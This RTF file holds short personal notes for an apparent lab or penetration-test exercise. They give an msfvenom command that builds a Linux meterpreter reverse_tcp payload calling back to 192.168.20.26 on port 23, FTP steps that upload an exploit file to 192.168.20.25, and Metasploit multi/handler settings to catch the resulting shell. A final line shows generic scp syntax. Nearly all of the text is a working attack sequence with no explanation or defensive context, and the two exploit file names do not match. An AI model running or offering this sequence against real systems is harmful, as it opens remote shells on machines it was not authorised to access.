{\rtf1\ansi\ansicpg1252\cocoartf2758
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fnil\fcharset0 Ubuntu-Regular;\f1\fnil\fcharset0 HelveticaNeue-Bold;\f2\fnil\fcharset0 HelveticaNeue;
}
{\colortbl;\red255\green255\blue255;\red57\green57\blue57;\red255\green255\blue255;}
{\*\expandedcolortbl;;\cssrgb\c28627\c28627\c28627;\cssrgb\c100000\c100000\c100000;}
\paperw11900\paperh16840\margl1440\margr1440\vieww11780\viewh7800\viewkind0
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0

\f0\fs28 \cf0 msfvenom \'97platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.20.26 LPORT=23 -f sh > hiddenexploit\
\
	ftp 192.168.20.25\
	> send mischiefexploit\
	> exit\
\
\
msfconsole\
\
use exploit/multi/handler \
\
set payload linux/x86/meterpreter/reverse_tcp\
\
show options \
\
set lport 23\
\
set lhost 192.168.20.26\
\
\
\
\
\pard\pardeftab720\partightenfactor0

\f1\b\fs28\fsmilli14400 \cf2 \cb3 \expnd0\expndtw0\kerning0
scp
\f2\b0 \'a0[options] [source username@IP]:/ [directory and file name] [destination username@IP]:/ [destination directory]\'a0if}